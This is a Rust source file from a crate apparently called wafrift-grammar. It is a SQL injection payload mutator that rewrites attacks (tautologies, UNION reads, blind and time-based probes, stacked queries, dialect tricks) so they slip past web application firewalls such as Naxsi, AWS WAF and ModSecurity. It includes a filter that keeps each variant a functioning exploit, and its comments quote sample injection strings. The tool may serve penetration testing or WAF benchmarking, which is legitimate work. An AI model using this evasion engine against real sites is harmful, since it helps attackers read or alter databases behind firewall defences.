wafrift-grammar 0.2.16

//! SQL grammar-aware payload mutation.
//!
//! Understands SQL semantics and generates equivalent queries that look
//! different to regex-based WAF rules while preserving behavior.

use rand::Rng;

/// AST-level SQL metamorphism (sqlparser lift -> transform -> lower).
pub mod ast_metamorph;
/// Blind and time-based SQL mutation helpers.
pub mod blind;
/// Comment-based SQL mutation helpers.
pub mod comments;
/// Shared SQL mutation types and helpers.
pub mod common;
/// Keyword-free SQL mutation helpers for high-paranoia WAF bypass.
pub mod keywordless;
/// MSSQL dialect mutations.
pub mod mssql;
/// MySQL dialect mutations.
pub mod mysql;
/// Operator and delimiter SQL mutation helpers.
pub mod operators;
/// Oracle dialect mutations.
pub mod oracle;
/// PostgreSQL dialect mutations.
pub mod postgres;
/// Quote-free / comment-free rewrites for high-paranoia WAFs (Naxsi,
/// AWS WAF managed, modsec PL3+).
pub mod quote_free;
/// SQLite dialect mutations.
pub mod sqlite;
/// String and whitespace SQL mutation helpers.
pub mod strings;
/// Tautology SQL mutation helpers.
pub mod tautology;
/// UNION-specific SQL mutation helpers.
pub mod union;

pub use common::SqlMutation;

use crate::grammar::sql::blind::{
    boolean_blind_mutations, error_blind_mutations, json_xml_mutations, order_by_probes,
    stacked_query_mutations, time_blind_mutations,
};
use crate::grammar::sql::comments::{
    keyword_comment_mutations, nested_comment_mutations, version_comment_mutations,
};
use crate::grammar::sql::common::{
    COMMENT_TERMINATORS, WHITESPACE_ALTERNATIVES, and_alternatives, equality_alternatives,
    extract_quoted_string, or_alternatives,
};
use crate::grammar::sql::keywordless::keywordless_mutations;
use crate::grammar::sql::operators::{
    replace_comment_terminator, replace_equality, replace_logical_operator,
};
use crate::grammar::sql::strings::{hex_literal, no_space_wrap, split_string_concat};
use crate::grammar::sql::tautology::{TAUTOLOGIES, contains_tautology, replace_tautology};
use crate::grammar::sql::union::{
    UNION_ALTERNATIVES, replace_union, union_column_probes, union_mutations,
};

#[cfg(test)]
mod tests;

/// Generate grammar-aware mutations of a SQL injection payload.
#[allow(clippy::too_many_lines)]
#[must_use]
pub fn mutate(payload: &str, max_mutations: usize) -> Vec<SqlMutation> {
    if payload.is_empty() || max_mutations == 0 {
        return Vec::new();
    }

    let mut results = Vec::new();
    let mut rng = rand::thread_rng();
    let lower = payload.to_ascii_lowercase();

    // Priority 1: quote-free / comment-free rewrites (Naxsi, AWS WAF
    // managed, modsec PL3+). Promoted ABOVE keywordless because high-
    // paranoia WAFs flag the math-only operator forms keywordless emits
    // (`1-1`, `+1+`) just as aggressively as quoted SQL — but they
    // pass clean integer-comparison forms (`1 OR 1=1`, `1 IS NOT NULL`)
    // through. Live-confirmed against wafrift-bench naxsi.
    extend_until_limit(
        &mut results,
        max_mutations,
        quote_free::mutations(payload, max_mutations / 3),
    );

    // Priority 2: keyword-free mutations (bypass PL2 WAFs).
    extend_until_limit(
        &mut results,
        max_mutations,
        keywordless_mutations(payload, max_mutations / 4),
    );

    // AST-level metamorphism: lift -> transform -> lower via sqlparser.
    // Yields semantic-identical fragments with different text signatures.
    extend_until_limit(
        &mut results,
        max_mutations,
        ast_metamorph::mutations(payload, max_mutations / 4),
    );

    if contains_tautology(payload) {
        for tautology in TAUTOLOGIES {
            if results.len() >= max_mutations {
                break;
            }

            if let Some(mutated) = replace_tautology(payload, tautology)
                && mutated != payload
            {
                results.push(SqlMutation {
                    payload: mutated,
                    description: format!("tautology → {tautology}"),
                    rules_applied: vec!["tautology_swap"],
                });
            }
        }
    }

    for comment in COMMENT_TERMINATORS {
        if results.len() >= max_mutations {
            break;
        }

        if let Some(mutated) = replace_comment_terminator(payload, comment)
            && mutated != payload
        {
            results.push(SqlMutation {
                payload: mutated,
                description: format!("comment → {comment}"),
                rules_applied: vec!["comment_swap"],
            });
        }
    }

    push_logical_operator_mutation(
        &mut results,
        payload,
        max_mutations,
        or_alternatives(),
        "or",
        "OR",
    );
    push_logical_operator_mutation(
        &mut results,
        payload,
        max_mutations,
        and_alternatives(),
        "and",
        "AND",
    );

    for whitespace in &WHITESPACE_ALTERNATIVES[1..] {
        if results.len() >= max_mutations {
            break;
        }

        let mutated = payload.replace(' ', whitespace);
        if mutated != payload {
            results.push(SqlMutation {
                payload: mutated,
                description: format!("whitespace → {whitespace:?}"),
                rules_applied: vec!["whitespace_swap"],
            });
        }
    }

    if lower.contains("union") && lower.contains("select") {
        for union_alternative in UNION_ALTERNATIVES {
            if results.len() >= max_mutations {
                break;
            }

            if let Some(mutated) = replace_union(payload, union_alternative)
                && mutated != payload
            {
                results.push(SqlMutation {
                    payload: mutated,
                    description: format!("UNION → {union_alternative}"),
                    rules_applied: vec!["union_swap"],
                });
            }
        }
    }

    for equality_alternative in equality_alternatives() {
        if results.len() >= max_mutations {
            break;
        }

        if let Some(mutated) = replace_equality(payload, equality_alternative)
            && mutated != payload
        {
            results.push(SqlMutation {
                payload: mutated,
                description: format!("= → {}", equality_alternative.trim()),
                rules_applied: vec!["equality_swap"],
            });
        }
    }

    if let Some(string_value) = extract_quoted_string(payload) {
        push_string_mutations(&mut results, payload, max_mutations, &string_value);
    }

    push_comment_keyword_mutations(&mut results, payload, max_mutations);

    if results.len() < max_mutations
        && let Some(string_value) = extract_quoted_string(payload)
    {
        let hex = hex_literal(&string_value);
        let mutated = payload.replace(&format!("'{string_value}'"), &hex);
        if mutated != payload {
            results.push(SqlMutation {
                payload: mutated,
                description: format!("hex literal: '{string_value}' → {hex}"),
                rules_applied: vec!["hex_literal"],
            });
        }
    }

    if results.len() < max_mutations
        && let Some(mutated) = no_space_wrap(payload)
    {
        results.push(SqlMutation {
            payload: mutated,
            description: "no-space: parenthesis wrapping instead of spaces".to_string(),
            rules_applied: vec!["no_space"],
        });
    }

    if lower.contains("order by") || lower.contains("union") {
        for probe in order_by_probes(10) {
            if results.len() >= max_mutations {
                break;
            }

            results.push(SqlMutation {
                payload: probe.clone(),
                description: format!("ORDER BY probe: {probe}"),
                rules_applied: vec!["order_by_probe"],
            });
        }
    }

    push_combined_whitespace_mutations(&mut results, max_mutations, &mut rng);
    extend_until_limit(
        &mut results,
        max_mutations,
        time_blind_mutations(payload, max_mutations),
    );
    extend_until_limit(
        &mut results,
        max_mutations,
        stacked_query_mutations(payload, max_mutations),
    );

    if results.len() < max_mutations
        && let Some(string_value) = extract_quoted_string(payload)
    {
        push_postgres_quote_mutations(&mut results, payload, max_mutations, &string_value);
    }

    extend_until_limit(
        &mut results,
        max_mutations,
        json_xml_mutations(max_mutations),
    );
    extend_until_limit(
        &mut results,
        max_mutations,
        boolean_blind_mutations(payload, max_mutations),
    );
    extend_until_limit(
        &mut results,
        max_mutations,
        error_blind_mutations(payload, max_mutations),
    );
    extend_until_limit(
        &mut results,
        max_mutations,
        union_mutations(payload, max_mutations),
    );
    // Nested comment mutations — defeats WAFs that strip one comment layer
    for (mutated, desc) in nested_comment_mutations(payload, max_mutations) {
        if results.len() >= max_mutations {
            break;
        }
        results.push(SqlMutation {
            payload: mutated,
            description: desc,
            rules_applied: vec!["nested_comment"],
        });
    }
    // UNION column probes (only if payload contains UNION)
    if lower.contains("union") {
        extend_until_limit(&mut results, max_mutations, union_column_probes(10));
    }

    // Dialect-specific mutations — always reserve at least 20% of budget.
    // Use an extended limit so dialect mutations always get included.
    let dialect_limit = max_mutations + max_mutations / 5;
    let per_dialect = (max_mutations / 5).max(5);
    if per_dialect > 0 {
        extend_strings_until_limit(
            &mut results,
            dialect_limit,
            mysql::mutate(payload, per_dialect),
            "mysql",
        );
        extend_strings_until_limit(
            &mut results,
            dialect_limit,
            postgres::mutate(payload, per_dialect),
            "postgres",
        );
        extend_strings_until_limit(
            &mut results,
            dialect_limit,
            mssql::mutate(payload, per_dialect),
            "mssql",
        );
        extend_strings_until_limit(
            &mut results,
            dialect_limit,
            oracle::mutate(payload, per_dialect),
            "oracle",
        );
        extend_strings_until_limit(
            &mut results,
            dialect_limit,
            sqlite::mutate(payload, per_dialect),
            "sqlite",
        );
    }

    // ── Anti-rig chokepoint ──────────────────────────────────────────
    // A "mutation" of an attack must still BE that attack. Several
    // generators (json_xml, keywordless, canned-tautology, …) emit
    // fixed library payloads with ZERO relation to the input — so a
    // request to evade `1 AND extractvalue(...)` came back as
    // `' OR JSON_EXTRACT('{"a":1}','$.a')=1--`. That destroys the
    // exploit and is exactly what made the bench report fake bypasses.
    //
    // For a boolean tautology, a canned tautology IS equivalent — skip
    // the filter there (adversarial-twin: legit keyword-free rewrites
    // must survive). For any structured attack (UNION / error-based /
    // stacked / blind / time), every returned variant MUST still carry
    // at least one significant token of the original — checked after
    // stripping SQL comments + whitespace so legitimate
    // comment-injection evasions (`extr/**/actvalue`) still pass.
    if is_structured_attack(payload) {
        let markers = significant_tokens(payload);
        if !markers.is_empty() {
            results.retain(|m| {
                let norm = strip_sql_comments_ws(&m.payload);
                let var_tokens: std::collections::HashSet<String> =
                    norm.split(|c: char| !c.is_ascii_alphanumeric())
                        .filter(|t| t.len() >= 4)
                        .map(str::to_ascii_lowercase)
                        .collect();
                markers.iter().any(|mk| var_tokens.contains(mk))
            });
        }
    }

    // Final truncate: dialect mutations are allowed to extend beyond base
    // budget during collection so each dialect gets a fair share, but the
    // public contract promises at most `max_mutations` results.
    results.truncate(max_mutations);
    results
}

/// True when the payload is a STRUCTURED attack: it has a data-
/// exfiltration or secondary effect (UNION read, error-based extract,
/// time/boolean blind, stacked statement, file/proc access) — NOT just
/// "make the WHERE true".
///
/// This is the axis that matters for the anti-rig gate. A pure boolean
/// tautology or an `'admin'--` auth bypass CAN be swapped for an
/// equivalent always-true expression (same effect) — that is a valid
/// mutation. A structured attack CANNOT: replacing `extractvalue(...)`
/// or `UNION SELECT pw` with `1 OR 1=1` throws the exploit away. So:
///   * structured  → forbid canned substitution, enforce token
///     preservation (the variant must still be THIS attack);
///   * not structured → canned/keyword-free tautology rewrites are
///     legitimate equivalents, no preservation filter.
///
/// The old `contains_tautology` substring check got this exactly wrong:
/// `1 AND IF(1=1,SLEEP(5),0)` (time-blind) "contained `1=1`" so it was
/// treated as a tautology and its payload replaced by `'+0+'`.
pub(crate) fn is_structured_attack(payload: &str) -> bool {
    let s = strip_sql_comments_ws(payload);
    const STRUCTURED: &[&str] = &[
        "union", "select", "sleep(", "benchmark(", "waitfor", "extractvalue",
        "updatexml", "load_file", "into outfile", "into dumpfile", ";", "insert ",
        "update ", "delete ", "drop ", "exec ", "xp_", "sp_", "pg_sleep", "dbms_",
        "utl_", "case when", "regexp ", "rlike ", "@@", "0x", "char(", "chr(",
        "concat", "ascii(", "substring", "substr(", "hex(", "unhex(", "if(",
        "floor(", "rand(", "count(", "group by", "having ", "procedure ",
    ];
    STRUCTURED.iter().any(|m| s.contains(m))
}

/// Significant lowercase tokens (alphanumeric runs ≥ 4 chars) of a
/// payload — the attack's class-defining vocabulary
/// (`extractvalue`, `union`, `select`, `concat`, `sleep`, …). A real
/// evasion preserves at least one; a canned substitution carries none.
fn significant_tokens(payload: &str) -> std::collections::HashSet<String> {
    strip_sql_comments_ws(payload)
        .split(|c: char| !c.is_ascii_alphanumeric())
        .filter(|t| t.len() >= 4 && t.chars().any(|c| c.is_ascii_alphabetic()))
        .map(str::to_ascii_lowercase)
        .collect()
}

/// Lowercased copy with SQL comments removed and whitespace collapsed,
/// so comment-injection evasions (`UN/**/ION`, `sel--\nect`) normalise
/// back to the keyword they evade rather than reading as a new token.
fn strip_sql_comments_ws(s: &str) -> String {
    let mut out = String::with_capacity(s.len());
    let b = s.as_bytes();
    let mut i = 0;
    while i < b.len() {
        if i + 1 < b.len() && b[i] == b'/' && b[i + 1] == b'*' {
            // Skip /* … */ (including /*! … */ MySQL conditional).
            i += 2;
            while i + 1 < b.len() && !(b[i] == b'*' && b[i + 1] == b'/') {
                i += 1;
            }
            i += 2;
        } else if b[i] == b'-' && i + 1 < b.len() && b[i + 1] == b'-' {
            while i < b.len() && b[i] != b'\n' {
                i += 1;
            }
        } else if b[i] == b'#' {
            while i < b.len() && b[i] != b'\n' {
                i += 1;
            }
        } else {
            out.push(b[i] as char);
            i += 1;
        }
    }
    out.to_ascii_lowercase()
}

fn extend_strings_until_limit(
    results: &mut Vec<SqlMutation>,
    max_mutations: usize,
    strings: Vec<String>,
    dialect: &'static str,
) {
    for s in strings {
        if results.len() >= max_mutations {
            break;
        }
        results.push(SqlMutation {
            payload: s,
            description: format!("{dialect} dialect mutation"),
            rules_applied: vec![dialect],
        });
    }
}

fn push_logical_operator_mutation(
    results: &mut Vec<SqlMutation>,
    payload: &str,
    max_mutations: usize,
    alternatives: &[String],
    target: &str,
    label: &str,
) {
    if let Some(mutated) = replace_logical_operator(payload, alternatives, target)
        && results.len() < max_mutations
        && mutated != payload
    {
        results.push(SqlMutation {
            payload: mutated,
            description: format!("{label} keyword alternative"),
            rules_applied: vec!["logical_op_swap"],
        });
    }
}

fn push_string_mutations(
    results: &mut Vec<SqlMutation>,
    payload: &str,
    max_mutations: usize,
    string_value: &str,
) {
    for split in split_string_concat(string_value) {
        if results.len() >= max_mutations {
            break;
        }

        results.push(SqlMutation {
            payload: payload.replace(&format!("'{string_value}'"), &split),
            description: format!("string split: '{string_value}' → {split}"),
            rules_applied: vec!["string_split"],
        });
    }
}

fn push_comment_keyword_mutations(
    results: &mut Vec<SqlMutation>,
    payload: &str,
    max_mutations: usize,
) {
    for (mutated, description) in keyword_comment_mutations(payload, max_mutations - results.len())
    {
        if results.len() >= max_mutations {
            break;
        }

        results.push(SqlMutation {
            payload: mutated,
            description,
            rules_applied: vec!["mysql_conditional"],
        });
    }

    for (mutated, description) in version_comment_mutations(payload, max_mutations - results.len())
    {
        if results.len() >= max_mutations {
            break;
        }

        results.push(SqlMutation {
            payload: mutated,
            description,
            rules_applied: vec!["mysql_version_conditional"],
        });
    }
}

fn push_combined_whitespace_mutations(
    results: &mut Vec<SqlMutation>,
    max_mutations: usize,
    rng: &mut impl Rng,
) {
    if results.is_empty() || results.len() >= max_mutations {
        return;
    }

    let n_combined = (max_mutations - results.len()).min(5);
    for _ in 0..n_combined {
        let base_index = rng.r#gen_range(0..results.len());
        let whitespace_index = rng.r#gen_range(1..WHITESPACE_ALTERNATIVES.len());
        let base_payload = results[base_index].payload.clone();
        let combined = base_payload.replace(' ', WHITESPACE_ALTERNATIVES[whitespace_index]);
        if combined != base_payload {
            let mut rules = results[base_index].rules_applied.clone();
            rules.push("combined_whitespace");
            results.push(SqlMutation {
                payload: combined,
                description: format!(
                    "combined: {} + whitespace {:?}",
                    results[base_index].description, WHITESPACE_ALTERNATIVES[whitespace_index]
                ),
                rules_applied: rules,
            });
        }
    }
}

fn push_postgres_quote_mutations(
    results: &mut Vec<SqlMutation>,
    payload: &str,
    max_mutations: usize,
    string_value: &str,
) {
    if results.len() >= max_mutations {
        return;
    }
    let dollar_quoted = format!("$${string_value}$$");
    let mutated = payload.replace(&format!("'{string_value}'"), &dollar_quoted);
    if mutated != payload {
        results.push(SqlMutation {
            payload: mutated,
            description: format!("PG dollar-sign quoting: '{string_value}' → $${string_value}$$"),
            rules_applied: vec!["pg_dollar_quote"],
        });
    }

    if results.len() >= max_mutations {
        return;
    }
    let tagged = format!("$tag${string_value}$tag$");
    let mutated_tagged = payload.replace(&format!("'{string_value}'"), &tagged);
    if mutated_tagged != payload {
        results.push(SqlMutation {
            payload: mutated_tagged,
            description: format!(
                "PG tagged dollar-sign: '{string_value}' → $tag${string_value}$tag$"
            ),
            rules_applied: vec!["pg_dollar_quote_tagged"],
        });
    }
}

fn extend_until_limit(
    results: &mut Vec<SqlMutation>,
    max_mutations: usize,
    mutations: Vec<SqlMutation>,
) {
    for mutation in mutations {
        if results.len() >= max_mutations {
            break;
        }
        results.push(mutation);
    }
}